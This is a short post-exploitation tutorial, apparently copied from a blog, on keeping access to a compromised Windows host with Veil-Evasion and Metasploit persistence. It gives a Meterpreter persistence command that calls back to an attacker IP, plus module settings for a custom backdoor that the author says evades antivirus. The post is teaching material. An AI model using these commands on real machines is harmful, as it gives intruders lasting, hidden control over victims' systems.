首页 > 其他 > 详细

Ethical Hacking - POST EXPLOITATION(2)

时间:2020-02-06 20:40:12      阅读:97      评论:0      收藏:0      [点我收藏+]

MAINTAINING ACCESS - Methods

1. Using a veil-evasion

  • Rev_http_service
  • Rev_tcp_service
  • Use it instead of a normal backdoor.
  • Or upload and execute from meterpreter.
  • Does not always work.

2. Using persistence module

  • run persistence -h
  • Detectable by antivirus programs.

技术分享图片

run persistence -U -i 20 -p 80 -r 10.0.0.43

 

3. Using Metasploit + veil-evasion -> More robust + undetectable by Antivirus

  • > use exploit/windows/local/persistence

技术分享图片

  • > set session [session id]

技术分享图片

  • > set exe::custom[backdoor location]

技术分享图片

  • >exploit

 

Ethical Hacking - POST EXPLOITATION(2)

原文:https://www.cnblogs.com/keepmoving1113/p/12270080.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!